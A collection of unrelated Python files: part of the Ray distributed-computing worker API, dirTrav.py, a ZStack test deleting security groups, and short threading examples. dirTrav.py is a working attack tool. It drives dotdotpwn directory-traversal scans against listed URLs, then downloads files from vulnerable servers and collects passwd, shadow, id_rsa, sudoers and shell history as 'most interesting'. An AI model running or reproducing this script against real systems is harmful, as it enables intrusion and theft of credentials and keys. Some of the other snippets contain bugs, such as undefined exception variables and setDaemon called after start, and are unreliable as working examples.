f"Expect an `ray.actor.ActorHandle`, but got: {type(_owner)}")
with profiling.profile("ray.put"):
try:
object_ref = worker.put_object(
value, owner_address=serialize_owner_address)
except ObjectStoreFullError:
logger.info(
"Put failed since the value was either too large or the "
"store was full of pinned objects.")
raise
return object_ref
# Global variable to make sure we only send out the warning once.
blocking_wait_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def wait(object_refs: List[ray.ObjectRef],
*,
num_returns: int = 1,
timeout: Optional[float] = None,
fetch_local: bool = True
) -> Tuple[List[ray.ObjectRef], List[ray.ObjectRef]]:
"""Return a list of IDs that are ready and a list of IDs that are not.
If timeout is set, the function returns either when the requested number of
IDs are ready or when the timeout is reached, whichever occurs first. If it
is not set, the function simply waits until that number of objects is ready
and returns that exact number of object refs.
This method returns two lists. The first list consists of object refs that
correspond to objects that are available in the object store. The second
list corresponds to the rest of the object refs (which may or may not be
ready).
Ordering of the input list of object refs is preserved. That is, if A
precedes B in the input list, and both are in the ready list, then A will
precede B in the ready list. This also holds true if A and B are both in
the remaining list.
This method will issue a warning if it's running inside an async context.
Instead of ``ray.wait(object_refs)``, you can use
``await asyncio.wait(object_refs)``.
Args:
object_refs (List[ObjectRef]): List of object refs for objects that may
or may not be ready. Note that these IDs must be unique.
num_returns (int): The number of object refs that should be returned.
timeout (float): The maximum amount of time in seconds to wait before
returning.
fetch_local (bool): If True, wait for the object to be downloaded onto
the local node before returning it as ready. If False, ray.wait()
will not trigger fetching of objects to the local node and will
return immediately once the object is available anywhere in the
cluster.
Returns:
A list of object refs that are ready and a list of the remaining object
IDs.
"""
worker = global_worker
worker.check_connected()
if hasattr(worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio(
) and timeout != 0:
global blocking_wait_inside_async_warned
if not blocking_wait_inside_async_warned:
logger.debug("Using blocking ray.wait inside async method. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.wait. ")
blocking_wait_inside_async_warned = True
if isinstance(object_refs, ObjectRef):
raise TypeError(
"wait() expected a list of ray.ObjectRef, got a single "
"ray.ObjectRef")
if not isinstance(object_refs, list):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got {type(object_refs)}")
if timeout is not None and timeout < 0:
raise ValueError("The 'timeout' argument must be nonnegative. "
f"Received {timeout}")
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError("wait() expected a list of ray.ObjectRef, "
f"got list containing {type(object_ref)}")
worker.check_connected()
# TODO(swang): Check main thread.
with profiling.profile("ray.wait"):
# TODO(rkn): This is a temporary workaround for
# https://github.com/ray-project/ray/issues/997. However, it should be
# fixed in Arrow instead of here.
if len(object_refs) == 0:
return [], []
if len(object_refs) != len(set(object_refs)):
raise ValueError("Wait requires a list of unique object refs.")
if num_returns <= 0:
raise ValueError(
"Invalid number of objects to return %d." % num_returns)
if num_returns > len(object_refs):
raise ValueError("num_returns cannot be greater than the number "
"of objects provided to ray.wait.")
timeout = timeout if timeout is not None else 10**6
timeout_milliseconds = int(timeout * 1000)
ready_ids, remaining_ids = worker.core_worker.wait(
object_refs,
num_returns,
timeout_milliseconds,
worker.current_task_id,
fetch_local,
)
return ready_ids, remaining_ids
@PublicAPI
@client_mode_hook(auto_init=True)
def get_actor(name: str,
namespace: Optional[str] = None) -> "ray.actor.ActorHandle":
"""Get a handle to a named actor.
Gets a handle to an actor with the given name. The actor must
have been created with Actor.options(name="name").remote(). This
works for both detached & non-detached actors.
Args:
name: The name of the actor.
namespace: The namespace of the actor, or None to specify the current
namespace.
Returns:
ActorHandle to the actor.
Raises:
ValueError if the named actor does not exist.
"""
if not name:
raise ValueError("Please supply a non-empty value to get_actor")
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
worker = global_worker
worker.check_connected()
return worker.core_worker.get_named_actor_handle(name, namespace or "")
@PublicAPI
@client_mode_hook(auto_init=True)
def kill(actor: "ray.actor.ActorHandle", *, no_restart: bool = True):
"""Kill an actor forcefully.
This will interrupt any running tasks on the actor, causing them to fail
immediately. ``atexit`` handlers installed in the actor will not be run.
If you want to kill the actor but let pending tasks finish,
you can call ``actor.__ray_terminate__.remote()`` instead to queue a
termination task. Any ``atexit`` handlers installed in the actor *will*
be run in this case.
If the actor is a detached actor, subsequent calls to get its handle via
ray.get_actor will fail.
Args:
actor (ActorHandle): Handle to the actor to kill.
no_restart (bool): Whether or not this actor should be restarted if
it's a restartable actor.
"""
worker = global_worker
worker.check_connected()
if not isinstance(actor, ray.actor.ActorHandle):
raise ValueError("ray.kill() only supported for actors. "
"Got: {}.".format(type(actor)))
worker.core_worker.kill_actor(actor._ray_actor_id, no_restart)
@PublicAPI
@client_mode_hook(auto_init=True)
def cancel(object_ref: ray.ObjectRef,
*,
force: bool = False,
recursive: bool = True):
"""Cancels a task according to the following conditions.
If the specified task is pending execution, it will not be executed. If
the task is currently executing, the behavior depends on the ``force``
flag. When ``force=False``, a KeyboardInterrupt will be raised in Python
and when ``force=True``, the executing task will immediately exit.
If the task is already finished, nothing will happen.
Only non-actor tasks can be canceled. Canceled tasks will not be
retried (max_retries will not be respected).
Calling ray.get on a canceled task will raise a TaskCancelledError or a
WorkerCrashedError if ``force=True``.
Args:
object_ref (ObjectRef): ObjectRef returned by the task
that should be canceled.
force (boolean): Whether to force-kill a running task by killing
the worker that is running the task.
recursive (boolean): Whether to try to cancel tasks submitted by the
task specified.
Raises:
TypeError: This is also raised for actor tasks.
"""
worker = ray.worker.global_worker
worker.check_connected()
if not isinstance(object_ref, ray.ObjectRef):
raise TypeError(
"ray.cancel() only supported for non-actor object refs. "
f"Got: {type(object_ref)}.")
return worker.core_worker.cancel_task(object_ref, force, recursive)
def _mode(worker=global_worker):
"""This is a wrapper around worker.mode.
We use this wrapper so that in the remote decorator, we can call _mode()
instead of worker.mode. The difference is that when we attempt to
serialize remote functions, we don't attempt to serialize the worker
object, which cannot be serialized.
"""
return worker.mode
def make_decorator(num_returns=None,
num_cpus=None,
num_gpus=None,
memory=None,
object_store_memory=None,
resources=None,
accelerator_type=None,
max_calls=None,
max_retries=None,
max_restarts=None,
max_task_retries=None,
runtime_env=None,
placement_group="default",
worker=None,
retry_exceptions=None,
concurrency_groups=None,
scheduling_strategy: SchedulingStrategyT = None):
def decorator(function_or_class):
if (inspect.isfunction(function_or_class)
or is_cython(function_or_class)):
# Set the remote function default resources.
if max_restarts is not None:
raise ValueError("The keyword 'max_restarts' is not "
"allowed for remote functions.")
if max_task_retries is not None:
raise ValueError("The keyword 'max_task_retries' is not "
"allowed for remote functions.")
if num_returns is not None and (not isinstance(num_returns, int)
or num_returns < 0):
raise ValueError(
"The keyword 'num_returns' only accepts 0 or a"
" positive integer")
if max_retries is not None and (not isinstance(max_retries, int)
or max_retries < -1):
raise ValueError(
"The keyword 'max_retries' only accepts 0, -1 or a"
" positive integer")
if max_calls is not None and (not isinstance(max_calls, int)
or max_calls < 0):
raise ValueError(
"The keyword 'max_calls' only accepts 0 or a positive"
" integer")
return ray.remote_function.RemoteFunction(
Language.PYTHON, function_or_class, None, num_cpus, num_gpus,
memory, object_store_memory, resources, accelerator_type,
num_returns, max_calls, max_retries, retry_exceptions,
runtime_env, placement_group, scheduling_strategy)
if inspect.isclass(function_or_class):
if num_returns is not None:
raise TypeError("The keyword 'num_returns' is not "
"allowed for actors.")
if max_retries is not None:
raise TypeError("The keyword 'max_retries' is not "
"allowed for actors.")
if retry_exceptions is not None:
raise TypeError("The keyword 'retry_exceptions' is not "
"allowed for actors.")
if max_calls is not None:
raise TypeError("The keyword 'max_calls' is not "
"allowed for actors.")
if max_restarts is not None and (not isinstance(max_restarts, int)
or max_restarts < -1):
raise ValueError(
"The keyword 'max_restarts' only accepts -1, 0 or a"
" positive integer")
if max_task_retries is not None and (not isinstance(
max_task_retries, int) or max_task_retries < -1):
raise ValueError(
"The keyword 'max_task_retries' only accepts -1, 0 or a"
" positive integer")
return ray.actor.make_actor(
function_or_class, num_cpus, num_gpus, memory,
object_store_memory, resources, accelerator_type, max_restarts,
max_task_retries, runtime_env, concurrency_groups,
scheduling_strategy)
raise TypeError("The @ray.remote decorator must be applied to "
"either a function or to a class.")
return decorator
@PublicAPI
def remote(*args, **kwargs):
"""Defines a remote function or an actor class.
This can be used with no arguments to define a remote function or actor as
follows:
.. code-block:: python
@ray.remote
def f():
return 1
@ray.remote
class Foo:
def method(self):
return 1
It can also be used with specific keyword arguments as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Remote task and actor objects returned by @ray.remote can also be
dynamically modified with the same arguments as above using
``.options()`` as follows:
.. code-block:: python
@ray.remote(num_gpus=1, max_calls=1, num_returns=2)
def f():
return 1, 2
g = f.options(num_gpus=2)
@ray.remote(num_cpus=2, resources={"CustomResource": 1})
class Foo:
def method(self):
return 1
Bar = Foo.options(num_cpus=1, resources=None)
Running remote actors will be terminated when the actor handle to them
in Python is deleted, which will cause them to complete any outstanding
work and then shut down. If you want to kill them immediately, you can
also call ``ray.kill(actor)``.
Args:
num_returns (int): This is only for *remote functions*. It specifies
the number of object refs returned by
the remote function invocation.
num_cpus (float): The quantity of CPU cores to reserve
for this task or for the lifetime of the actor.
num_gpus (int): The quantity of GPUs to reserve
for this task or for the lifetime of the actor.
resources (Dict[str, float]): The quantity of various custom resources
to reserve for this task or for the lifetime of the actor.
This is a dictionary mapping strings (resource names) to floats.
accelerator_type: If specified, requires that the task or actor run
on a node with the specified type of accelerator.
See `ray.accelerators` for accelerator types.
max_calls (int): Only for *remote functions*. This specifies the
maximum number of times that a given worker can execute
the given remote function before it must exit
(this can be used to address memory leaks in third-party
libraries or to reclaim resources that cannot easily be
released, e.g., GPU memory that was acquired by TensorFlow).
By default this is infinite.
max_restarts (int): Only for *actors*. This specifies the maximum
number of times that the actor should be restarted when it dies
unexpectedly. The minimum valid value is 0 (default),
which indicates that the actor doesn't need to be restarted.
A value of -1 indicates that an actor should be restarted
indefinitely.
max_task_retries (int): Only for *actors*. How many times to
retry an actor task if the task fails due to a system error,
e.g., the actor has died. If set to -1, the system will
retry the failed task until the task succeeds, or the actor
has reached its max_restarts limit. If set to `n > 0`, the
system will retry the failed task up to n times, after which the
task will throw a `RayActorError` exception upon :obj:`ray.get`.
Note that Python exceptions are not considered system errors
and will not trigger retries.
max_retries (int): Only for *remote functions*. This specifies
the maximum number of times that the remote function
should be rerun when the worker process executing it
crashes unexpectedly. The minimum valid value is 0,
the default is 4 (default), and a value of -1 indicates
infinite retries.
runtime_env (Dict[str, Any]): Specifies the runtime environment for
this actor or task and its children. See
:ref:`runtime-environments` for detailed documentation. This API is
in beta and may change before becoming stable.
retry_exceptions (bool): Only for *remote functions*. This specifies
whether application-level errors should be retried
up to max_retries times.
scheduling_strategy (SchedulingStrategyT): Strategy about how to
schedule a remote function or actor. Possible values are
None: ray will figure out the scheduling strategy to use, it
will either be the PlacementGroupSchedulingStrategy using parent's
placement group if parent has one and has
placement_group_capture_child_tasks set to true,
or "DEFAULT";
"DEFAULT": default hybrid scheduling;
"SPREAD": best effort spread scheduling;
`PlacementGroupSchedulingStrategy`:
placement group based scheduling.
"""
worker = global_worker
if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):
# This is the case where the decorator is just @ray.remote.
return make_decorator(worker=worker)(args[0])
# Parse the keyword arguments from the decorator.
valid_kwargs = [
"num_returns",
"num_cpus",
"num_gpus",
"memory",
"object_store_memory",
"resources",
"accelerator_type",
"max_calls",
"max_restarts",
"max_task_retries",
"max_retries",
"runtime_env",
"retry_exceptions",
"placement_group",
"concurrency_groups",
"scheduling_strategy",
]
error_string = ("The @ray.remote decorator must be applied either "
"with no arguments and no parentheses, for example "
"'@ray.remote', or it must be applied using some of "
f"the arguments in the list {valid_kwargs}, for example "
"'@ray.remote(num_returns=2, "
"resources={\"CustomResource\": 1})'.")
assert len(args) == 0 and len(kwargs) > 0, error_string
for key in kwargs:
assert key in valid_kwargs, error_string
num_cpus = kwargs["num_cpus"] if "num_cpus" in kwargs else None
num_gpus = kwargs["num_gpus"] if "num_gpus" in kwargs else None
resources = kwargs.get("resources")
if not isinstance(resources, dict) and resources is not None:
raise TypeError("The 'resources' keyword argument must be a "
f"dictionary, but received type {type(resources)}.")
if resources is not None:
assert "CPU" not in resources, "Use the 'num_cpus' argument."
assert "GPU" not in resources, "Use the 'num_gpus' argument."
accelerator_type = kwargs.get("accelerator_type")
# Handle other arguments.
num_returns = kwargs.get("num_returns")
max_calls = kwargs.get("max_calls")
max_restarts = kwargs.get("max_restarts")
max_task_retries = kwargs.get("max_task_retries")
memory = kwargs.get("memory")
object_store_memory = kwargs.get("object_store_memory")
max_retries = kwargs.get("max_retries")
runtime_env = kwargs.get("runtime_env")
placement_group = kwargs.get("placement_group", "default")
retry_exceptions = kwargs.get("retry_exceptions")
concurrency_groups = kwargs.get("concurrency_groups")
scheduling_strategy = kwargs.get("scheduling_strategy")
return make_decorator(
num_returns=num_returns,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory=memory,
object_store_memory=object_store_memory,
resources=resources,
accelerator_type=accelerator_type,
max_calls=max_calls,
max_restarts=max_restarts,
max_task_retries=max_task_retries,
max_retries=max_retries,
runtime_env=runtime_env,
placement_group=placement_group,
worker=worker,
retry_exceptions=retry_exceptions,
concurrency_groups=concurrency_groups or [],
scheduling_strategy=scheduling_strategy)
|
dirTrav.py
|
#!/usr/bin/python
#ONLY WEB HAS BEEN IMPLEMENTED
#If /usr/share/dotdotpwn/Reports exists, dotdotpwn will automatically put raw results in there for you
#Reconscan.py creates the Reports directory for you
import sys
import os
import subprocess
from subprocess import CalledProcessError
import argparse
import multiprocessing
from multiprocessing import Process, Queue
import requests
import time
from shutil import move
#This function currently runs regular and an extension web scans using ddpwn on a list of URLs
#If something is found, it will output the result to the /dirb/ directory
def dotPwn(URL):
#Usage: ./dotdotpwn.pl -m <module> -h <host> [OPTIONS]
# Available options:
# -m Module [http | http-url | ftp | tftp | payload | stdout]
# -h Hostname
# -O Operating System detection for intelligent fuzzing (nmap)
# -o Operating System type if known ("windows", "unix" or "generic")
# -s Service version detection (banner grabber)
# -d Depth of traversals (e.g. deepness 3 equals to ../../../; default: 6)
# -f Specific filename (e.g. /etc/motd; default: according to OS detected, defaults in TraversalEngine.pm)
# -E Add @Extra_files in TraversalEngine.pm (e.g. web.config, httpd.conf, etc.)
# -S Use SSL for HTTP and Payload module (not needed for http-url, use a https:// url instead)
# -u URL with the part to be fuzzed marked as TRAVERSAL (e.g. http://foo:8080/id.php?x=TRAVERSAL&y=31337)
# -k Text pattern to match in the response (http-url & payload modules - e.g. "root:" if trying /etc/passwd)
# -p Filename with the payload to be sent and the part to be fuzzed marked with the TRAVERSAL keyword
# -x Port to connect (default: HTTP=80; FTP=21; TFTP=69)
# -t Time in milliseconds between each test (default: 300 (.3 second))
# -X Use the Bisection Algorithm to detect the exact deepness once a vulnerability has been found
# -e File extension appended at the end of each fuzz string (e.g. ".php", ".jpg", ".inc")
# -U Username (default: 'anonymous')
# -P Password (default: 'dot@dot.pwn')
# -M HTTP Method to use when using the 'http' module [GET | POST | HEAD | COPY | MOVE] (default: GET)
# -r Report filename (default: 'HOST_MM-DD-YYYY_HOUR-MIN.txt')
# -b Break after the first vulnerability is found
# -q Quiet mode (doesn't print each attempt)
# -C Continue if no data was received from host
# why am I not using the -p option for filename with payloads?
port, resultsOut, baseURL, URL, module = parseURL(URL)
konfirmString,konfirmFile = setDotPwnOptions()
if ("TRAVERSAL" in URL):
#last update added 'module' (previously http-url) and -h for host. May need to revert
#if the -h option breaks http-url
DOTPWN = 'dotdotpwn.pl -m %s -u %s -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -q -C -b' % (module, URL, baseURL, konfirmString, konfirmFile, args.depth, args.os, port)
print "DOTPWN: %s" % DOTPWN
DOTPWNE = 'dotdotpwn.pl -m %s -u %s -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (module, URL, baseURL, konfirmString, konfirmFile, args.depth, args.os, port, args.extensions)
else:
print "WARN: NO 'TRAVERSAL' TARGETING STRING FOUND IN URL"
DOTPWN = 'dotdotpwn.pl -m http -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -q -C -b' % (baseURL, konfirmString, konfirmFile, args.depth, args.os, port)
DOTPWNE = 'dotdotpwn.pl -m http -h %s -k %s -f %s -d %s -o %s -x %s -t 1 -e %s -q -C -b' % (baseURL, konfirmString, konfirmFile, args.depth, args.os, port, args.extensions)
try:
DOTPWNRESULTS = subprocess.check_output(DOTPWN, shell=True)
except CalledProcessError as ex:
writeOutputFile = True
text = ex.output.split("\n")
for line in text:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s" % resultsOut
print "INFO: Traversals found! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(ex.output)
outFileWriter.close()
except:
raise
if (len(vuln) == 0): #don't run extension scan if we already have a vuln
try:
DOTPWNERESULTS = subprocess.check_output(DOTPWNE, shell=True)
except CalledProcessError as fx:
writeOutputFile = True
textE = fx.output.split("\n")
for line in textE:
if ("[+] Total Traversals found: 0" == line):
print "INFO: No traversals found for %s using file extensions" % URL
writeOutputFile = False
if ("<- VULNERABLE" in line):
vuln.append(line)
if (writeOutputFile):
try:
outfile = "/root/scripts/recon_enum/results/exam/dotdotpwn/E%s" % resultsOut
print "INFO: Traversals found using extensions! See %s" % outfile
outFileWriter = open(outfile, "w")
outFileWriter.write(fx.output)
outFileWriter.close()
except:
raise
if (args.scan_and_retrieve and len(vuln) > 0):
print "INFO: Downloading files"
retrieve()
#grab pieces to build URL, feed in files to grab,
def retrieve():
vulnURLs = analyzeVuln(vuln)
tmp = vulnURLs[0]
vulnProto = tmp[0]
vulnBase = tmp[1]
vulnPage = tmp[2]
vulnStringPrefix = tmp[3]
vulnStringSuffix = tmp[4]
encodedSplit = tmp[5]
try:
xfilFileName = "%s" % args.xfil_files
xfilFile = open(xfilFileName,'r')
for xfil in xfilFile:
if (xfil[0] == "/"):
xfil = xfil[1:]
if ("\n" in xfil):
xfil = xfil[:-1]
xfiltmp = xfil.replace("/", "_") #for outputFile
vulnBasetmp = vulnBase.replace("/", "_") #for outputFile
xfil = xfil.replace("/", encodedSplit)
#2x vulnStringPrefix due to a parsing bug. Additional shouldn't hurt....
if vulnPage == "":
fullURL = vulnProto + vulnBase + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
else:
fullURL = vulnProto + vulnBase + vulnPage + vulnStringPrefix + vulnStringPrefix + xfil + vulnStringSuffix
#print "DEBUG: %s" % fullURL
fileContents, status_code = grabFileFromURL(fullURL)
if (status_code == 200):
outputFile = "/root/scripts/recon_enum/results/exam/dotdotpwn/%s_%s" % (vulnBasetmp, xfiltmp)
try:
output = open(outputFile, 'w+')
output.write(fileContents)
output.close()
except UnicodeEncodeError:
#print "WARNING: Unicode errors. Forcing ascii, xmlcharrefreplace"
output = open(outputFile, 'w+')
fileContents = fileContents.encode('ascii','xmlcharrefreplace')
output.write(fileContents)
output.close()
except:
raise
except:
raise
sortRetrievedFiles()
time.sleep(1)
sortMostInterestingFiles()
time.sleep(1)
sortEverythingElse()
print "INFO: Downloading of files complete"
def grabFileFromURL(url):
try:
r = requests.get(url)
if (r.status_code == 200):
return r.text, r.status_code
else:
return False, r.status_code
except:
raise
def sortRetrievedFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
sizes = []
moveTheseFiles = []
for item in files:
if os.path.isfile(item):
sizes.append(os.path.getsize(item))
for size in sizes:
if sizes.count(size) > 3:
moveTheseFiles.append(size)
for sizeOfitems in moveTheseFiles:
try:
os.makedirs(str(sizeOfitems))
except:
pass
#print "Warning: Dir already exists"
for items in files:
if os.path.getsize(items) == sizeOfitems:
newpath = "./%s/%s" % (str(sizeOfitems),items)
os.rename(items,newpath)
files.remove(items)
def sortMostInterestingFiles():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
mostInterestingFiles = "passwd","shadow","id_rsa","id_dsa","passdb","samba","ssh","authorized","sudoers","history"
try:
os.makedirs("mostInteresting")
except:
pass
for item in files:
for name in mostInterestingFiles:
if (name in item):
new = "./mostInteresting/%s" % (item)
move(item,new)
break
def sortEverythingElse():
downloadDir = "/root/scripts/recon_enum/results/exam/dotdotpwn/"
os.chdir(downloadDir)
files = os.listdir(downloadDir)
everythingElse = "etc","var","proc"
try:
for folder in everythingElse:
os.makedirs(folder)
except:
pass
for item in files:
for name in everythingElse:
if (os.path.isdir(item)):
break
if (name in item):
new = "./%s/%s" % (name,item)
move(item,new)
break
##1, grab port
##2, output file cannot have "/" in filename
##3, grab base url, http module doesn't like http://
##4, file has \n causing errors in query, strip those
def parseURL(url):
tmp = url.split(":")
if (len(tmp) == 3):
tmp2 = tmp[2]
port = tmp2.split("/")[0]
if (len(tmp) <= 2):
if ("https" == tmp[0]):
port = "443"
elif ("http" == tmp[0]):
port = "80"
if (len(tmp) > 3): #this should never happen
port = "80"
try:
resultsOut = url.split("/")[2] + url.split("/")[3]
except:
raise
tmp4 = url.split(":")[1]
baseURL = tmp4[2:]
if ("\n" in url):
URL = url[:-1]
else:
URL = url
if ("http" in URL):
module = "http-url"
elif ("ftp" in URL):
module = "ftp"
#print "Port, resOut, baseURL, URL: %s %s %s %s %s" % (port, resultsOut, baseURL, URL, module)
return port, resultsOut, baseURL, URL, module
def setDotPwnOptions():
if (args.os == "unix"):
konfirmString = '"root:"'
konfirmFile = '/etc/passwd'
if (args.os == "windows"):
konfirmString = '"[fonts]"'
konfirmFile = '/windows/win.ini'
return konfirmString,konfirmFile
#will return values to build a string like base+page+pre+path+encodedsplit+userrequestfile+suffix
#let base = IP:Port/
#let vulnPage = page.ext[/|=]
def analyzeVuln(vulnar):
final = []
for vuln in vulnar:
vulnProto = ""
vulnURL = []
vulnBase = ""
vulnPage = ""
vulnStringPrefix = ""
vulnStringSuffix = ""
encodedSplit = ""
tmp = vuln[17:len(vuln)-14] #vuln is entire line from [*] testing url... to <- VULNERABLE
vulnURL.append(tmp)
if ("http://" in tmp):
vulnProto = "http://"
vulnBase = tmp.split("http://")[1]
if ("https://" in tmp):
vulnProto = "https://"
vulnBase = tmp.split("https://")[1]
if ("ftp://" in tmp):
vulnProto = "ftp://"
vulnBase = tmp.split("ftp://")[1]
vulnPagetmp = vulnBase.split("/",1)[1]
vulnBase = vulnBase.split("/",1)[0]
vulnBase = vulnBase + "/"
#print "DEBUG: vulnBase %s" % vulnBase
#print "DEBUG: vulnPagetmp: %s" % vulnPagetmp
if ("=" in vulnPagetmp): #vulnPage with param, ie 'index.php?arg='
vulnPage = vulnPagetmp.split("=",1)[0]
vulnPage = vulnPage + "="
vulnStringPrefixtmp = vulnPagetmp.split("=",1)[1]
else: #vulnPage with no param, ie index.php/
if ("passwd" in vulnPagetmp or "win.ini" in vulnPagetmp):
#the vulnPage may be equal to the vulnBase/webRoot, no specific page
vulnPage = ""
else:
vulnPage = vulnPagetmp.split("/",2)[0]
vulnPage = vulnPage + "/"
#print "DEBUG: vulnPagetmpsplit %s" % vulnPagetmp.split("/",2)
vulnStringPrefixtmp = vulnPagetmp.split("/",2)[len(vulnPagetmp.split("/",2))-1]
#print "DEBUG: vulnStringPrefixtmp: %s" %vulnStringPrefixtmp
if (args.os == 'unix'): #looking for passwd and issue, user specified file not available yet
vulnStringPrefix = vulnStringPrefixtmp.split("etc")[0]
encodedSplittmp = vulnStringPrefixtmp.split("etc")[1]
if ("passwd" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("passwd")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if ("issue" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("issue")[1]
for c in encodedSplittmp:
if (c == "p"):
break
else:
encodedSplit = encodedSplit + c
if (args.os == 'windows'):
print "VulnStringPrefixtmp: " + vulnStringPrefixtmp
vulnStringPrefix = vulnStringPrefixtmp.split("windows")[0]
encodedSplittmp = vulnStringPrefixtmp.split("windows")[1]
if ("win.ini" in vulnStringPrefixtmp):
vulnStringSuffix = vulnStringPrefixtmp.split("win.ini")[1]
for c in encodedSplittmp:
if (c == "w"):
break
else:
encodedSplit = encodedSplit + c
vals = vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit
print "DEBUG: Make sure these values are correct: vulnProto, vulnBase, vulnPage, vulnStringPrefix, vulnStringSuffix, encodedSplit"
print vals
final.append(vals)
return final
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Rough script to handle discovery of and exfiltration of data through directory traversal. Recommend invoke with: dirTrav <URLs> <os> -sr')
parser.add_argument('-d', '--scan-depth', type=int, action="store", dest="depth", default=10, help="depth of ../../../ to extend to, default of 10")
parser.add_argument('-e', '--extensions', type=str, action="store", dest="extensions", default='".html"', help='extensions appended at the end of each fuzz string (e.g. \'".php", ".jpg", ".inc"\' Entire list needs to be encased in single quotes. Each extension needs to be in double quotes. There needs to be a comma and a space between each extension)')
parser.add_argument('file', type=str, help="file with URLs to fuzz")
parser.add_argument('os', type=str, action="store", help="OS greatly helps reduce false positives and reduces scan time. 'windows' or 'unix'")
parser.add_argument('-s', '--scan', action="store_true", dest="scan", default="true", help="scan the target for directory traversal")
parser.add_argument('-sr', '--scan-and-retrieve', nargs='?', const='true', default='false', dest="scan_and_retrieve", help="scan and retrieve files if a directory traversal is found")
parser.add_argument('-x', '--xfil-files', type=str, action="store", dest="xfil_files", default="/root/lists/Personal/DirTrav/linux_all.txt", help="list of files to retrieve if a directory traversal vulnerability is found. Default is linux_all.txt.")
args = parser.parse_args()
#print args
vuln = []
inputFileName = "%s" % args.file
if (args.os == "windows"):
if ("linux_all.txt" in args.xfil_files):
print "Error: Will not retrieve linux files from Windows. Set os to Linux or pass a file with Windows files to -x"
raise
if (args.os == "linux"):
if ("windows_all.txt" in args.xfil_files):
print "Error: Will not retrieve windows files from Linux. Set os to Windows or pass a file with Linux files to -x"
raise
if (args.scan):
try:
inputFile = open(inputFileName,'r')
jobs = []
print "INFO: Starting Dotdotpwn"
for URL in inputFile:
if ("\n" in URL):
URL = URL[:-1]
if (URL[0] != "#"):
#print "Processing %s" % URL
p = multiprocessing.Process(target=dotPwn, args=(URL,))
jobs.append(p)
p.start()
inputFile.close()
except:
raise
|
delete_sg.py
|
'''
Destroy all security groups (find from ZStack database).
@author: Youyk
'''
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.net_operations as net_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import apibinding.inventory as inventory
import threading
import os
import time
import sys
thread_threshold = os.environ.get('ZSTACK_THREAD_THRESHOLD')
if not thread_threshold:
thread_threshold = 1000
else:
thread_threshold = int(thread_threshold)
session_uuid = None
session_to = None
session_mc = None
def delete_sgs(sgs):
for sg in sgs:
thread = threading.Thread(target=net_ops.delete_security_group, args=(sg.uuid, session_uuid))
while threading.active_count() > thread_threshold:
time.sleep(0.05)
exc = sys.exc_info()
if exc[0]:
raise info1, None, info2
thread.start()
while threading.activeCount() > 1:
exc = sys.exc_info()
if exc[0]:
raise info1, None, info2
time.sleep(0.1)
def test():
global session_to
global session_mc
global session_uuid
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
session_uuid = acc_ops.login_as_admin()
num = res_ops.query_resource_count(res_ops.SECURITY_GROUP, [], session_uuid)
if num <= thread_threshold:
sgs = res_ops.query_resource(res_ops.SECURITY_GROUP, [], session_uuid)
delete_sgs(sgs)
else:
start = 0
limit = thread_threshold - 1
curr_num = start
sgs = []
while curr_num < num:
sgs_tmp = res_ops.query_resource_fields(res_ops.SECURITY_GROUP, \
[], session_uuid, ['uuid'], start, limit)
sgs.extend(sgs_tmp)
curr_num += limit
start += limit
delete_sgs(sgs)
#con_ops.change_global_config('identity', 'session.timeout', session_to)
#con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
left_num = res_ops.query_resource_count(res_ops.SECURITY_GROUP, [], session_uuid)
acc_ops.logout(session_uuid)
if left_num == 0:
test_util.test_pass('Delete SG Success. Delete %d SGs.' % num)
else:
test_util.test_fail('Delete SG Fail. %d SGs are not deleted.' % left_num)
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc)
if session_uuid:
acc_ops.logout(session_uuid)
|
Chap10_Example10.18.py
|
from threading import Thread
daemonchk = False
def disp():
if daemonchk:
print('Display function only if it is daemon thread')
else:
print("Non-daemon thread")
threadobj = Thread(target = disp)
print("Before setting thread as daemon: ", threadobj.isDaemon())
if threadobj.isDaemon():
daemonchk = True
threadobj.start()
threadobj.setDaemon(True)
|
multi_threading_ref.py
|
import threading
import time
start = time.perf_counter()
def do_something():
print('\nSleeping for 1 second')
time.sleep(1)
print('\nDone sleeping')
t1 = threading.Thread(target=do_something)
